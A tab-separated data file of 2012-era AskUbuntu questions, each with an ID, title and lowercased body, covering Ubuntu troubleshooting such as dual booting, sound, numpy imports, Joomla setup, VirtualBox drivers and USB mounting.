230875	changing ubuntu one installation folder in windows	i changed my windows default programs ( x86 ) folder to another partition , i have all my programs installed there , it 's in d : , but the automatic ubuntuone installation puts the program in c : , obviously , when my windows looks for ubuntuone on d : ( where it 's automatically directed ) it does n't find it . after installation i have to change the path to the program but it keeps giving me error messages and it 's not working properly . is there any way i can change the default installation path ?
230878	dual boot windows 8 and ubuntu with windows 8 boot manager	i have two partitions on my hard-didk , i have installed ubuntu on my 1st partition and windows 8 later on another partition.now i can only boot into windows 8 because it does n't recognize ubuntu . how would i dual boot my pc without using grub . i would like using windows 8 boot manager as its pretty neat . this is what i have tried : i tried using easybcd but it does n't work.it causes the boot manager to switch to windows 7 boot manager . easybcd creates a c : /nst/autoneogrub0.mbr file . as easybcd was causing the boot manager to switch i created a manual entry to the bcd store uisng windows bcdedit command and point it to the c : /nst/autoneogrub0.mbr file created by easybcd . this gave me the windows 8 boot-manager with ubuntu entry , but grub is unable to find the root partition . is there any other work around or solution for this ? any help would be appreciated . note : the windows 8 boot manager is sky blue color interactive menu with mouse and other options and windows 7 boot manager is the normal black and white one where you can only use your keyboard i do n't want to install grub because it would prevent my windows 8 from updating as its a genuine msdn version and various other reasons
230879	how to install ubuntu 12.10 in a new uefi enabled windows 8 laptop ?	i just checked askubuntu for answers but ca n't find the right answer ... i just bought a new hp envy laptop which have windows 8 . in this machine , how can i install ubuntu 12.10 ? i need to dual boot and also need to keep the uefi . how can i do it ? can anyone please give a detailed step by step instructions ? thank you
230881	launch bar problem	pls see the attached image , seem to me that i press a key combination that put numbers in my launch bar and not allow it to hide . how can i restore my default launch bar behavior and remove those numbers and letters ( 's ' and 't ' ) ?
230888	is there another way to restart the sound system if pulseaudio/alsa do n't work ?	i was listening to music , and my sound suddenly went dead in all my applications . i 'm using ubuntu 12.04 , which uses pulseaudio , so i tried sudo /etc/init.d/pulseaudio restart , but nothing happened . according to lsof | grep pcm , nothing is using the soundcard at the moment , although i 'm not entirely sure if my source for that command is applicable . is there a way another way to restart ubuntu 12.04 's sound system from the command line without rebooting the system ?
230890	for some reason i want to set the system date to earlier month but i am unable to set it	for some reason i want to set the system date to earlier month in my ubuntu 12.04 machine ? but i am unable to set it . when i tried to change the system time to earlier month or year getting back to the original current date . i deselected automatically from the internet and selected manually . how can i do it please guide me through . any help will be appreciated . thanks in advance
230895	duplicity fails with timeout	after one hour of backup with deja-dup , it failed with this exception . is this a network problem on my side ? traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1403 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1396 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1247 , in main action = commandline.processcommandline ( sys.argv [ 1 : ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/commandline.py '' , line 1007 , in processcommandline backup , local_pathname = set_backend ( args [ 0 ] , args [ 1 ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/commandline.py '' , line 900 , in set_backend globals.backend = backend.get_backend ( bend ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 158 , in get_backend return _backends [ pu.scheme ] ( pu ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/u1backend.py '' , line 74 , in __init__ self.create_volume ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 323 , in iterate return fn ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/u1backend.py '' , line 161 , in create_volume answer = auth.request ( self.volume_uri , http_method= '' put '' ) file `` /usr/lib/python2.7/dist-packages/ubuntuone-couch/ubuntuone/couch/auth.py '' , line 152 , in request url , method=http_method , headers=headers , body=request_body ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1444 , in request ( response , content ) = self._request ( conn , authority , uri , request_uri , method , body , headers , redirections , cachekey ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1196 , in _request ( response , content ) = self._conn_request ( conn , request_uri , method , body , headers ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1132 , in _conn_request conn.connect ( ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 889 , in connect sock.connect ( ( self.host , self.port ) ) file `` /usr/lib/python2.7/socket.py '' , line 224 , in meth return getattr ( self._sock , name ) ( *args ) timeout : timed out
230896	what is the default theme in xubuntu 12.10	i am using opensuse 12.2 and i would like to apply the default look and feel of xubuntu 12.10 . i would like to know what is the default desktop theme name icon set name default settings of the dock ( the dock at the bottom ) - how to apply transparency etc what are other general default settings to make it feel like xubuntu . where can i get xubuntu 12.10 / ubuntu 12.10 wallpapers ? what is the mouse icon theme ?
230897	unable to see dvd drive on ubuntu 12.10	i know that the drive is connected properly since i have ubuntu installed along side windows 7 and the drive works within windows . i do not see it in the media folder as specified in other answers . when executing the following script within the terminal here are my finds . please advise . jamie @ optiplex-790 : ~ $ sudo lshw -c disk [ sudo ] password for jamie : *-disk description : ata disk product : samsung ssd pm83 physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : cxm0 serial : s0tynzabc63105 size : 119gib ( 128gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=b2e138ff *-cdrom description : dvd-ram writer product : dvd+-rw gh70n vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : a101 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc jamie @ optiplex-790 : ~ $
230900	cedarview drivers boot to a blank screen	i 'm following the tutorial following tutorial to get my intel d2700dc motherboard 's graphics working : http : //daily.siebler.eu/2012/06/ubuntu-12-04-driver-for-intel-cedarview-atom-n2000-und-d2000-serie/ when i boot i 'm getting a blank screen . i followed the tutorial and read all the comments . i 've also tried : install gdm and use this instead of lightdm ( ubuntu default ) sudo apt-get install gdm remove previous pae kernel : http : //www.liberiangeek.net/2011/11/remove-old-kernels-in-ubuntu-11-10-oneiric-ocelot/ reboot before adding cedarview packages . have tried with and without the video=lvds-1 : d to grub_cmdline_linux_default variable in /etc/default/grub . i still get a blank screen . i am plugged into a hd screen through the hdmi and have tried the dvi connector also . i can see the grub menu , then a little of the loading and then 'no signal ' . i can still ssh into the box though so it is logging in . lspci -v -s 00:02.0 00:02.0 vga compatible controller : intel corporation atom processor d2xxx/n2xxx integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : intel corporation device 2011 flags : bus master , fast devsel , latency 0 , irq 45 memory at 80100000 ( 32-bit , non-prefetchable ) [ size=1m ] i/o ports at 20d0 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : pvrsrvkm kernel modules : cedarview_gfx uname -a linux test-desktop 3.2.0-35-generic # 55-ubuntu smp wed dec 5 17:45:18 utc 2012 i686 i686 i386 gnu/linux
230903	evince wo n't save files , says `` permission denied ''	if i go into evince 's save dialog , go to /home/username/documents , in my home directory , and try to create a new directory ( e.g . foo ) , the operation fails . evince says : could not create directory /home/ [ username ] /documents/foo : permission denied evince refuses to save files , too , with the same sort of message . i am running ubuntu 12.04 and evince 3.4.0 . i should also mention that /home is a symlink to /media/hdd/home ( the filesystem is split across a solid-state drive and hdd ; a bit of an experiment ) . this does not bother any other applications . evince is running as me , and should have write permissions on /media/hdd/home/username/documents , according to ls -l. dmesg shows that evince tried to create the directory , but was denied : [ 10991.212472 ] type=1400 audit ( 1355983426.653:614 ) : apparmor= '' denied '' operation= '' mkdir '' parent=1 profile= '' /usr/bin/evince '' name= '' /media/hdd/home /username/documents/foo/ '' pid=2940 comm= '' evince '' requested_mask= '' c '' denied_mask= '' c '' fsuid=1001 ouid=1001
230905	downloads killing internet on my home network	i am currently having a problem with my wireless . whenever i try to download anything it kills the internet for every other application ( tabs within the same browser , browsers on other computers on the same network ) except the process doing the download . this occurs with everything from downloading updates to iso 's . i am not using a torrent . it happens when downloading upgrades , browser downloads , or anything else . this problem does not occur when i use windows 7 on the same computer and it stops killing the internet for other computers if i turn the download/ubuntu off . i am using an asus g74sx laptop running ubuntu 12.10 with gnome 3.6 . my wireless card is an intel corporation centrino wireless-n + wimax 6150 ( rev 67 ) thanks !
230906	i was trying to install `` joomla '' but i got 403 forbidden error	i followed the rules on this link : http : //www.upubuntu.com/2012/02/how-to-install-joomla-25x-on-ubuntu.html i was doing well until it told me to run cd /tmp & & wget -o joomla_2.5.7-stable.zip http : //goo.gl/41tms then it gave me this error : -- 2012-12-20 09:33:48 -- http : //goo.gl/41tms resolving goo.gl ( goo.gl ) ... 173.194.69.139 , 173.194.69.100 , 173.194.69.101 , ... connecting to goo.gl ( goo.gl ) |173.194.69.139|:80 ... connected . http request sent , awaiting response ... 403 forbidden 2012-12-20 09:33:49 error 403 : forbidden . how should i fix this ?
230907	import numpy - no module named multiarray	on ubuntu 12.04 64-bit , i installed python 2.7.3 , and numpy 1.6.2 . when i try to import numpy , i get this : erelsgl @ erel-biu : /host/dropbox/ai/routes $ python python 2.7.3 ( default , nov 25 2012 , 17:50:36 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import numpy traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/local/lib/python2.7/site-packages/numpy/__init__.py '' , line 137 , in < module > file `` /usr/local/lib/python2.7/site-packages/numpy/add_newdocs.py '' , line 9 , in < module > file `` /usr/local/lib/python2.7/site-packages/numpy/lib/__init__.py '' , line 4 , in < module > file `` /usr/local/lib/python2.7/site-packages/numpy/lib/type_check.py '' , line 8 , in < module > file `` /usr/local/lib/python2.7/site-packages/numpy/core/__init__.py '' , line 5 , in < module > importerror : no module named multiarray strangely , this problem does not occur on my other computer , which also runs ubuntu 12.04 64-bit . update : i removed the manual installation of numpy : $ sudo rm -rf /usr/local/lib/python2.7/site-packages/numpy then re-installed using apt : $ sudo apt-get install python-numpy reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libblas3gf libgfortran3 liblapack3gf suggested packages : python-numpy-doc python-numpy-dbg python-nose python-dev gfortran the following new packages will be installed : libblas3gf libgfortran3 liblapack3gf python-numpy 0 upgraded , 4 newly installed , 0 to remove and 115 not upgraded . need to get 6,918 kb of archives . after this operation , 19.2 mb of additional disk space will be used . do you want to continue [ y/n ] ? get:1 http : //il.archive.ubuntu.com/ubuntu/ precise/main libgfortran3 amd64 4.6.3-1ubuntu5 [ 357 kb ] get:2 http : //il.archive.ubuntu.com/ubuntu/ precise/main libblas3gf amd64 1.2.20110419-2ubuntu1 [ 287 kb ] get:3 http : //il.archive.ubuntu.com/ubuntu/ precise/main liblapack3gf amd64 3.3.1-1 [ 4,424 kb ] get:4 http : //il.archive.ubuntu.com/ubuntu/ precise/main python-numpy amd64 1:1.6.1-6ubuntu1 [ 1,850 kb ] fetched 6,918 kb in 0s ( 8,638 kb/s ) preconfiguring packages ... selecting previously unselected package libgfortran3 . ( reading database ... 80 % ( reading database ... 237799 files and directories currently installed . ) unpacking libgfortran3 ( from ... /libgfortran3_4.6.3-1ubuntu5_amd64.deb ) ... selecting previously unselected package libblas3gf . unpacking libblas3gf ( from ... /libblas3gf_1.2.20110419-2ubuntu1_amd64.deb ) ... selecting previously unselected package liblapack3gf . unpacking liblapack3gf ( from ... /liblapack3gf_3.3.1-1_amd64.deb ) ... selecting previously unselected package python-numpy . unpacking python-numpy ( from ... /python-numpy_1 % 3a1.6.1-6ubuntu1_amd64.deb ) ... processing triggers for man-db ... setting up libgfortran3 ( 4.6.3-1ubuntu5 ) ... setting up libblas3gf ( 1.2.20110419-2ubuntu1 ) ... update-alternatives : using /usr/lib/libblas/libblas.so.3gf to provide /usr/lib/libblas.so.3gf ( libblas.so.3gf ) in auto mode . setting up liblapack3gf ( 3.3.1-1 ) ... update-alternatives : using /usr/lib/lapack/liblapack.so.3gf to provide /usr/lib/liblapack.so.3gf ( liblapack.so.3gf ) in auto mode . setting up python-numpy ( 1:1.6.1-6ubuntu1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place then tried again , and now , numpy is not recognized at all ! $ python python 2.7.3 ( default , nov 25 2012 , 17:50:36 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import numpy traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named numpy
230912	installing `` joomla '' problem , how to turn off `` output buffering '' on php ?	i installed lampp , and then i downloaded newest version of `` joomla '' and i unpacked it to /var/www/joomla/ then i went to my browser and i opened this link : localhost/joomla so it opened the installation of joomla , then i chose language and went to the next page , in that page it showed me that the `` output buffering is on and it should be off so i run this command on the terminal : sudo gedit /etc/php5/apache2/php.ini i opened php.ini and then i found this : output buffering : 4096 i changed it to : output buffering : off then i saved php.ini and i refreshed the installation of joomla but output buffering was still on . how can i turn this off ?
230913	to remove operating system selection at the time of booting	i was using ubuntu 11 along with windows 7 home premium ( pre-install os is windows ) in my friends laptop before using in mine . then formated his laptop ( c drive format only ) and installed windows 7 again , in this process we lost ubuntu . but now also when system is booted/rebooted it show both the options of os windows7 as well ubuntu . why it shows both of the os when ubuntu is not present , and how to remove ubuntu choice to directly boot to windows7 . and also i want to know whether there was any loss of memory in this whole process ? ? ?
230916	video ( but not audio ) lags	i recently updated ubuntu from 10.04 to 12.04 , and the video playback on sites such as vevo and other flash-style sites utilizing video seem to lag considerably , sometimes even completely unwatchable . how do i fix that ?
230918	ca n't boot into ubuntu after remove window7	my friend have a computer pre-installing window 7 , but later he installed other systems including window 8 , and linux . all worked fine with the grub2 for a few weeks . yesterday , when he removed window 7 and restart computer all worked fine . but later he remove the partition where window7 formally located he ca n't boot any more just showing grub rescue.run ls ( hd0 , msdosx ) command , but all partitions are showing unknown filesystem.so he tried install a livecd and mistakenly run a memory test which was terminated by him in the half of the process . later , i try to boot using livecd ubuntu 12.10 , but when boot it , it just showing syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2010 h. peter anvin et al this livecd is fine and worked for me few days ago , then i try to boot using usb syslinux 4.05 2012-10-22 edd copyright ( c ) 1994-2012 h. peter anvin et al similar information displayed . what should i do ? thanks in advanced .
230925	how do i install matlab r2012b via the iso file ?	i want a quick and simple tutorial on `` install matlab r2012b via the iso file on my ubuntu 12.10 '' . as you know i have the iso file . consider that i 'm new to linux and ubuntu . help me please !
230926	how do i change the mtu value on ubuntu ?	if one 's internet connection is being limited by a unit that restricts the transfer , how would one be able to change a setting related to it - more specifically the mtuďź
230929	how can i controll brightness in sony vaio sve151a11w ?	disclaimer first : i have gone thorugh these following threads here and followed all of their advice but none of them worked brightness control problem on sony vaio with nvidia gt-320m unable to change brightness settings in sony vaio e series laptop brightness does n't change on sony laptop now the problem i have installed ubuntu 12.10 ( 64bit ) in this sony vaio laptop . after vanilla isntallation the brightness keys are working and i can see the brightness indictaor going up and down but it is n't having any effect on the real brightness of the device . i have installed additional drivers too but that did n't solve the problem . i ca n't seem to be able to change the brightness . anyone knows how i can fix this ?
230930	what 's the difference of partition type and filesystem type ?	i 'm formatting my seagate freeagent external hdd in linux to fat filesystem , because it ca n't be done in windows , but i 'm wondering , what 's the difference betweeen partition type and filesystem type ? and what 's the recommended partition type for fat filesystem ? i 'm going to use this drive in a linux pc , windows pc , and wii .
230932	disabling password and key login	i want to disable the login prompt to access the passwords and keys . right clicking the prompt does not bring up a change password dialogue . under applications > system tools > preferences there is `` passwords and keys '' but right clicking that does not allow me to change the password either . there is no password and keys selection under accessories . i used to be able to change the password to a blank character , which allowed it to automatically login , but there does n't seem to be an option for that now . using gnome 3 in 12.10 thank you
230938	system program problem detected	this question of mine is similar to this question . unlike the problems faced by the user who asked that question.. i am not facing any problems anywhere . infact my installation process was flaw-less unlike the one in the question . it 's just that whenever i login for the first time after a reboot , i get the same dialog-box as in that question . there are infact even more similar questions on the main site but none of the answers addressed that how to reach the the problem causing area and analyse it so that it could be repaired then on . i want to know that what 's causing that error message which shows up only when i log it after a reboot ( not with subsequent logout-login ) additional info : its a ubuntu minimal install - added lamp & mail server stack via tasksel - cinnamon as gui - mdm as loginmanager
230944	usb device first mounted as root , then by user	when i connect my kindle , it shows up as an usb0 media , which i can read but not write ( owner = root ) . however , if i do sudo umount /media/usb0 , usb0 gets unmounted and a kindle media gets mounted properly ( is writable etc. ) . what can cause such strange behavior ? it 's not only with kindle , but with flash drives etc . as well . my /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda2 during installation uuid=595815c2-d882-4ec8-a2cd-cce70471167c / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda6 during installation # uuid=1340a336-66ca-4743-a6e4-41a307af2dda /boot ext4 defaults 0 3 # swap was on /dev/sda5 during installation uuid=afa49f1d-d505-4166-82a2-2f44548a48c6 none swap sw 0 0 uuid=deb86039-528a-45f3-b5f9-ce528740c94e /data_hdd ext4 defaults 0 2 my groups : petr @ sova : ~ $ groups petr petr : petr adm cdrom sudo dip plugdev fuse lpadmin sambashare bumblebee edit ( see the last line ) : upon connecting petr @ sova : ~ $ sudo mount /dev/sda2 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sdb1 on /data_hdd type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/petr/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=petr ) /dev/sde1 on /media/usb0 type vfat ( rw , noexec , nodev , sync , noatime , nodiratime ) unmount petr @ sova : ~ $ sudo umount /media/usb0 with kindle ( after unmounting ) petr @ sova : ~ $ sudo mount /dev/sda2 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sdb1 on /data_hdd type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/petr/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=petr ) /dev/sde1 on /media/kindle type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks )
230946	custom keybindings without gnome-settings-daemon	i am using ubuntu 12.04 ( fallback ) and i am trying to slim it down , mostly for fun/learning experience . i killed gnome-settings-daemon because i set up my theming from elsewhere . but now some of my keybindings are lost . i think the windowmanager ones are still working , like alt-tab and switch workspace . but my mediakeys to change volume and my custom keybindings are not working anymore . is there a different way to save custom keybindings ? do i really need to run settings-manager to setup my keybindings ?
230947	change theme or wallpaper on swithing keyboard layout	is it possible to do it in ubuntu on every keyboard layout change ? i often find myself forgetting to change layout when it necessary . with this kind of functionality it will less likely to happen .
230949	why i can not comment with my acrobat reader 9.5.1 ?	i downloaded adobe acrobat 9.5.1 reader software package from adobe 's site . the .deb extension . but i can not see the comment menu under the tools , in any pdf file that i am trying to comment
230950	how to configure eth1 to be a failsafe for eth0 ?	i need to configure eth1 to be a failsafe interface for eth0 . when eth0 is down eth1 goes up and when eth0 is up eth1 goes down . i need to do this from /etc/network/interfaces .
230952	how do i fix a `` unknown configuration key `foreign-architecture ' found in your `dpkg ' configuration files . '' error ?	always when i install something , i get the following error multiple times : unknown configuration key 'foreign-architecture ' found in your 'dpkg' configuration files . this warning will become a hard error at a later date , so please remove the offending configuration options and replace them with 'dpkg -- add-architecture ' invocations at the command line . when i try dpkg -- add-architecture i get : unknown configuration key `foreign-architecture ' found in your `dpkg' configuration files . this warning will become a hard error at a later date , so please remove the offending configuration options and replace them with `dpkg -- add-architecture ' invocations at the command line . dpkg : error : -- add-architecture takes one argument type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! i 've no problems yet , but since it says this warning will become a hard error at a later date i better do something about this . when i search 'foreign-architecture ' , i find an empty file , containing not a single byte . i somehow ca n't delete that file . please help , it 's a kind of creapy ... i use ubuntu version 12.10 updated the questions : cat /etc/dpkg/dpkg.cfg no-debsig log /var/log/dpkg.log ls /etc/dpkg/dpkg.cfg.d/ multiarch
230954	problem with virtualbox in 12.10	when i try to start it i get : failed to open a session for the virtual machine windowsxp . the virtual machine 'windowsxp ' has terminated unexpectedly during startup with exit code 1 . result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } and in another dialog : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . when i try to run : $ sudo /etc/init.d/vboxdrv setup [ sudo ] password for umpirsky : sudo : /etc/init.d/vboxdrv : command not found any idea ?
230960	error while running bash script that moves files	i am new to bash script and want to create bash script that moves some days old files between source and destination as per days defined in script . when i run this script i get error find : paths must precede expression : mv usage : find [ -h ] [ -l ] [ -p ] [ -olevel ] [ -d help|tree|search|stat|rates|opt|exec ] [ path ... ] [ expression ] # ! /bin/bash echo `` enter your source directory '' read soure echo `` enter your destination directory '' read destination echo `` enter days '' read days find $ soure -mtime + $ days mv $ soure $ destination { } \ ; echo `` files $ days old moved from $ soure to $ destination '' what 's missing or wrong ? ? ? ? please help me to create this script .
230965	help with hard links and symlinks moving directory and files	i have a symlink /var linking to /tmpfs/var.1 /var - > /tmpfs/var.1 i start a script called cache_tmpfs from /etc/rc.local on startup . this script will copy /var.backup/* contents to /tmpfs/var.1/ cp -dprxf /var.backup/* /tmpfs/var.1/ now the problem is that kernel is opening messages log file in /var/log/messages , is it possible to remove the current /var symlink and recreate a new one ( that will symlink to /var.backup instead of /tmpfs/var.1 ) without issues as files once opened by system become hard links ? ? rm /var & & ln -s /var.backup /var
230967	eclipse ide unable to locate files in localhost	i am trying to get `` hello '' to pop up on a web page using localhost . software involved : os : ubuntu 12.04 eclipse ide , configured for php apache installed from here problem : http : //i.imgur.com/vwprb.png i tried to run eclipse from command prompt with sudo and it still did not work . i am also new to ubuntu and not very familiar with how the directory system works .
230977	using aoc usb monitor on ubuntu	i have recently moved from windows to ubuntu 12.10 . i have an aoc portable laptop monitor ( model number e1649fwu ) . this monitor works solely through usb . it works fine on windows , but i can not work out how to find/install drivers for ubuntu . i found this forum thread . any help would be greatly appreciated . update : it now displays the purple ubuntu start-up screen but an error is displayed on the 2nd monitor when login is complete . i get ubuntu as expected on my primary screen , and on the 2nd screen it gives a general protection fault . i followed the steps on this ask ubuntu question about installing a usb-link monitor , but the displaylink.c file throws c errors when i run ./configure & & make & & make install . i tried to fix these by modifying the c code , but no luck . i also tried using the xorg.conf file used in this tutorial , but this also does n't work . am i right in thinking that it is just a matter of getting the xorg.conf file correct now ? this is a picture of the error shown on the second screen :
230983	error while compiling c program using gcc < filename.c > thru the cli	whenever i try to compile a c program thru cli using gcc , i get the error : `` gcc : error trying to exec 'cc1plus ' : execvp : no such file or directory '' . i 'm using ubuntu 12.04 . also , `` sudo apt-get install gcc '' says it 's already there .
230984	steam requires beta `` experimental '' drivers . is this safe ?	i 've just installed steam for linux on my machine and i am given a error message telling me that my nvidia drivers are outdated . they tell me that i need the 304. ? ? drivers to continue . these are shown when i open `` external drivers '' , but they are shown as experimental beta . is it safe to activate them anyway . i mean ; i do n't want my computer to stop working and i have to reinstall ubuntu . if there is any other way i could get my steam client to work i would really like to know that to .
230985	ubuntu 12.10 slow boot time	since upgrading from precise ( 12.04 ) , my ubuntu pc boots very slowly . i checked dmesg and i see a big gap : [ 2.769327 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 3.382362 ] ext4-fs ( sda5 ) : info : recovery required on readonly filesystem [ 3.382366 ] ext4-fs ( sda5 ) : write access will be enabled during recovery [ 4.625913 ] ext4-fs ( sda5 ) : recovery complete [ 4.636909 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 28.456177 ] adding 2096444k swap on /dev/sda6 . priority : -1 extents:1 across:2096444k [ 28.461205 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 28.467773 ] udevd [ 396 ] : starting version 175 any idea of what append here ? i have not found any clue in other logs and do n't know how to resolve this .
230991	touchpad and trackpint is unresponsive	i have thinkpad edge s430 . i was using ubuntu 12.10 a bit more than a month . everything was working fine . on 20th of december updated and upgraded ubuntu , no issues . soon after that i suspended my laptop and when i activated it and logged in the touchpad and the trackpoint was unresponsive . i mean completely not working . since i also have windows 8 on the machine , i tried also there . the same issue . even tried live boot of windows ... nothing . i really dont know how it happened . could the ubuntu update and upgrade cause this ? also tried disabling and enabling in bios , but the problem was that there is no entry about touchpad . however i read somewhere that some with some thinkpads , the bios doesnt have this entry at all . but i dont know if my machine should or should not contain this entry . also it 's worth to mention that whenever i uninstall the touchpad driver in windows , reboot it , it prompts me to restart again , since it detect new hardware , that it is the touchpad . updating driver didnt worked . read a lot of forums with different solutions like fn+f # , also a list of sudo commands that should enable the touchpad . nothing what so ever . here is the list of updates and upgrades i made that day start-date : 2012-12-19 14:22:36 commandline : apt-get install ibam install : ibam : amd64 ( 0.5.2-2.1ubuntu1 ) end-date : 2012-12-19 14:22:46 start-date : 2012-12-19 15:36:02 commandline : apt-get install insync-beta-ubuntu install : insync-beta-ubuntu : amd64 ( 0.9.30 ) , xdotool : amd64 ( 2.20110530.1-3ubuntu1 , automatic ) , libxdo2 : amd64 ( 2.20110530.1-3ubuntu1 , automatic ) , gir1.2-nautilus-3.0 : amd64 ( 3.5.90.really.3.4.2-0ubuntu4 , automatic ) , python-nautilus : amd64 ( 1.1-3 , automatic ) end-date : 2012-12-19 15:36:24 start-date : 2012-12-19 16:42:50 commandline : apt-get upgrade upgrade : libglib2.0-data : amd64 ( 2.34.0-1ubuntu1 , 2.34.1-1ubuntu1 ) , wine1.5-i386 : i386 ( 1.5.19-0ubuntu1 , 1.5.19-0ubuntu3 ) , libgpod-common : amd64 ( 0.8.2-6build1 , 0.8.2-6ubuntu1 ) , wine1.5 : amd64 ( 1.5.19-0ubuntu1 , 1.5.19-0ubuntu3 ) , libgpod4 : amd64 ( 0.8.2-6build1 , 0.8.2-6ubuntu1 ) , libglib2.0-0 : amd64 ( 2.34.0-1ubuntu1 , 2.34.1-1ubuntu1 ) , libglib2.0-0 : i386 ( 2.34.0-1ubuntu1 , 2.34.1-1ubuntu1 ) , wine1.5-amd64 : amd64 ( 1.5.19-0ubuntu1 , 1.5.19-0ubuntu3 ) , libglib2.0-bin : amd64 ( 2.34.0-1ubuntu1 , 2.34.1-1ubuntu1 ) , shutter : amd64 ( 0.89.1~ppa4~quantal1 , 0.90~ppa4~quantal1 ) end-date : 2012-12-19 16:43:30 < i hope someone has an idea what happened and ho to fix this . thanks .
230992	how to know what an application was doing in background ?	i want to know what an application was doing in background . are there any monitoring logs or any recorded history of what any application was doing in background ? i 'm talking about any regular application , not a system service or process .
230994	python 2.7 : no documentation found when typing help ( 'print ' )	i have just installed python 2.7 and python 3.2 on my ubuntu 12.04 ( 32 bit ) . sudo apt-get install python python-doc python3 python3-doc i opened a python 3 shell ( is it called like that ) typing python3 from a terminal . if i issue the command help ( 'print ' ) everything works fine and i can read the documentation . however if i open a python 2.7 shell ( python from a terminal ) when i type help ( 'print ' ) i get the following message : no documentation found for 'print' how can i get to use the documentation in python 2.7 as well ?
